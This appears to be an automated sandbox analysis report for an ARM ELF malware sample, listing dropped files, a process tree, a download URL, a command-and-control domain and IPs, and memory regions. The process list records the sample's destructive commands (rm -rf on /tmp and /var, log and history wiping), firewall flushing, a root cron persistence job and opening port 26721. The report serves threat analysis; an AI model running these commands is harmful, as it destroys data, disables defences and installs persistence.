Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
arm5.elf
|
ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
|
initial sample
|
||
/dev/ocmount
|
Bourne-Again shell script, ASCII text executable
|
dropped
|
||
/etc/cron.d/mount.sh
|
ASCII text
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
/tmp/arm5.elf
|
/tmp/arm5.elf
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp"
|
||
/bin/sh
|
-
|
||
/usr/bin/rm
|
rm -rf /tmp/arm5.elf /tmp/config-err-dHT8bZ /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/snap.lxd /tmp/ssh-hOQ5FjG2iVgO /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-c4RYFi
/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-gKIF8e /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-gB0a9f
/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-APWnLg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj
/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-AfPZzg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-timedated.service-OmYV2g
/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-x0xO0i /tmp/vmware-root_721-4290559889 /var/backups /var/cache
/var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager
/var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup
/var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server
/var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm
/var/run/mlocate.daily.lock /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid
/var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket
/var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd
/var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd
/var/run/vmware /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-J6Q1Te /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-srP90f
/var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-biJ0Gi /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-1jIxdj
/var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-llmWag /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-X16eHh
/var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-timedated.service-McPs7g /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-GpSnaf
/var/log/wtmp
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "rm -rf /tmp/*"
|
||
/bin/sh
|
-
|
||
/usr/bin/rm
|
rm -rf /tmp/*
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "iptables -F"
|
||
/bin/sh
|
-
|
||
/usr/sbin/iptables
|
iptables -F
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "pkill -9 busybox"
|
||
/bin/sh
|
-
|
||
/usr/bin/pkill
|
pkill -9 busybox
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "pkill -9 perl"
|
||
/bin/sh
|
-
|
||
/usr/bin/pkill
|
pkill -9 perl
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "pkill -9 python"
|
||
/bin/sh
|
-
|
||
/usr/bin/pkill
|
pkill -9 python
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "service iptables stop"
|
||
/bin/sh
|
-
|
||
/usr/sbin/service
|
service iptables stop
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/basename
|
basename /usr/sbin/service
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/basename
|
basename /usr/sbin/service
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/systemctl
|
systemctl --quiet is-active multi-user.target
|
||
/usr/sbin/service
|
-
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/systemctl
|
systemctl list-unit-files --full --type=socket
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/sed
|
sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
|
||
/usr/bin/systemctl
|
systemctl stop iptables.service
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "/sbin/iptables -F; /sbin/iptables -X"
|
||
/bin/sh
|
-
|
||
/sbin/iptables
|
/sbin/iptables -F
|
||
/bin/sh
|
-
|
||
/sbin/iptables
|
/sbin/iptables -X
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "service firewall stop"
|
||
/bin/sh
|
-
|
||
/usr/sbin/service
|
service firewall stop
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/basename
|
basename /usr/sbin/service
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/basename
|
basename /usr/sbin/service
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/systemctl
|
systemctl --quiet is-active multi-user.target
|
||
/usr/sbin/service
|
-
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/systemctl
|
systemctl list-unit-files --full --type=socket
|
||
/usr/sbin/service
|
-
|
||
/usr/bin/sed
|
sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
|
||
/usr/bin/systemctl
|
systemctl stop firewall.service
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "history -c"
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "rm -rf ~/.bash_history"
|
||
/bin/sh
|
-
|
||
/usr/bin/rm
|
rm -rf /root/.bash_history
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "history -w"
|
||
/tmp/arm5.elf
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "chmod +x /dev/ocmount"
|
||
/bin/sh
|
-
|
||
/usr/bin/chmod
|
chmod +x /dev/ocmount
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh"
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c /dev/ocmount
|
||
/bin/sh
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/usr/sbin/iptables
|
iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/bin/busybox
|
/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/usr/bin/busybox
|
busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
|
||
/tmp/arm5.elf
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/usr/sbin/iptables
|
iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/bin/busybox
|
/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/bin/sh
|
sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
|
||
/bin/sh
|
-
|
||
/usr/bin/busybox
|
busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
|
||
/tmp/arm5.elf
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/tmp/arm5.elf
|
-
|
||
/usr/libexec/gnome-session-binary
|
-
|
||
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-sharing
|
||
/usr/libexec/gsd-sharing
|
/usr/libexec/gsd-sharing
|
||
/usr/lib/systemd/systemd
|
-
|
||
/usr/lib/upower/upowerd
|
/usr/lib/upower/upowerd
|
||
/usr/lib/systemd/systemd
|
-
|
||
/usr/lib/upower/upowerd
|
/usr/lib/upower/upowerd
|
||
/usr/libexec/gnome-session-binary
|
-
|
||
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-keyboard
|
||
/usr/libexec/gsd-keyboard
|
/usr/libexec/gsd-keyboard
|
||
/usr/lib/systemd/systemd
|
-
|
||
/usr/lib/upower/upowerd
|
/usr/lib/upower/upowerd
|
||
/usr/libexec/gnome-session-binary
|
-
|
||
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
|
||
/usr/libexec/gsd-rfkill
|
/usr/libexec/gsd-rfkill
|
||
/usr/bin/xfce4-panel
|
-
|
||
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray
"Notification Area" "Area where notification icons appear"
|
||
/usr/bin/xfce4-panel
|
-
|
||
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921
statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
|
||
/usr/libexec/gnome-session-binary
|
-
|
||
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-smartcard
|
||
/usr/libexec/gsd-smartcard
|
/usr/libexec/gsd-smartcard
|
||
/usr/bin/xfce4-panel
|
-
|
||
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8
12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
|
||
/usr/libexec/gnome-session-binary
|
-
|
||
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-datetime
|
||
/usr/libexec/gsd-datetime
|
/usr/libexec/gsd-datetime
|
||
/usr/lib/systemd/systemd
|
-
|
||
/usr/lib/upower/upowerd
|
/usr/lib/upower/upowerd
|
||
/usr/libexec/gnome-session-binary
|
-
|
||
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-media-keys
|
||
/usr/libexec/gsd-media-keys
|
/usr/libexec/gsd-media-keys
|
||
/usr/libexec/gnome-session-binary
|
-
|
||
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-screensaver-proxy
|
||
/usr/libexec/gsd-screensaver-proxy
|
/usr/libexec/gsd-screensaver-proxy
|
||
/usr/bin/xfce4-panel
|
-
|
||
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9
12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness
of your display"
|
||
/usr/bin/xfce4-panel
|
-
|
||
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so
10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
|
||
/usr/bin/xfce4-panel
|
-
|
||
/usr/lib/systemd/systemd
|
-
|
||
/usr/lib/upower/upowerd
|
/usr/lib/upower/upowerd
|
||
/usr/libexec/gnome-session-binary
|
-
|
||
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-power
|
||
/usr/libexec/gsd-power
|
/usr/libexec/gsd-power
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/sda2
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://Change_ip/octopus_re.sh;chmod
|
unknown
|
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
octopus1337.geek
|
156.238.224.214
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
109.202.202.202
|
unknown
|
Switzerland
|
||
212.118.43.167
|
unknown
|
Russian Federation
|
||
156.238.224.214
|
octopus1337.geek
|
Seychelles
|
||
91.189.91.43
|
unknown
|
United Kingdom
|
||
91.189.91.42
|
unknown
|
United Kingdom
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
7fc00803d000
|
page execute read
|
|||
7fc00803d000
|
page execute read
|
|||
7fc10e393000
|
page read and write
|
|||
7fc10eb81000
|
page read and write
|
|||
7fc108021000
|
page read and write
|
|||
55b924699000
|
page read and write
|
|||
7fc10f06d000
|
page read and write
|
|||
7fc00804f000
|
page read and write
|
|||
7fc10ef44000
|
page read and write
|
|||
7fc10ed63000
|
page read and write
|
|||
7fc10e9f2000
|
page read and write
|
|||
7fc10e393000
|
page read and write
|
|||
7fc107fff000
|
page read and write
|
|||
7fc10e787000
|
page read and write
|
|||
7fc10db8b000
|
page read and write
|
|||
55b9214c5000
|
page execute read
|
|||
7fc10ed63000
|
page read and write
|
|||
7fc10f06d000
|
page read and write
|
|||
55b92371d000
|
page execute and read and write
|
|||
7fc10ef44000
|
page read and write
|
|||
7fc10e425000
|
page read and write
|
|||
7ffd6a3b5000
|
page read and write
|
|||
55b92171f000
|
page read and write
|
|||
7fc10e787000
|
page read and write
|
|||
55b924699000
|
page read and write
|
|||
55b921716000
|
page read and write
|
|||
55b92371d000
|
page execute and read and write
|
|||
7ffd6a3e9000
|
page execute read
|
|||
7fc10ea15000
|
page read and write
|
|||
7fc10f0d6000
|
page read and write
|
|||
7fc10e9f2000
|
page read and write
|
|||
7fc10f091000
|
page read and write
|
|||
7fc10db8b000
|
page read and write
|
|||
55b9246b9000
|
page read and write
|
|||
7fc00804a000
|
page read and write
|
|||
7fc10f0d6000
|
page read and write
|
|||
7fc108021000
|
page read and write
|
|||
7fc10e425000
|
page read and write
|
|||
55b923734000
|
page read and write
|
|||
7fc10f091000
|
page read and write
|
|||
7fc107fff000
|
page read and write
|
|||
55b921716000
|
page read and write
|
|||
55b9214c5000
|
page execute read
|
|||
7fc00804f000
|
page read and write
|
|||
7fc10ea15000
|
page read and write
|
|||
7ffd6a3b5000
|
page read and write
|
|||
7ffd6a3e9000
|
page execute read
|
|||
7fc10eb81000
|
page read and write
|
|||
7fc008051000
|
page read and write
|
|||
55b923734000
|
page read and write
|
|||
55b92171f000
|
page read and write
|
|||
7fc00804a000
|
page read and write
|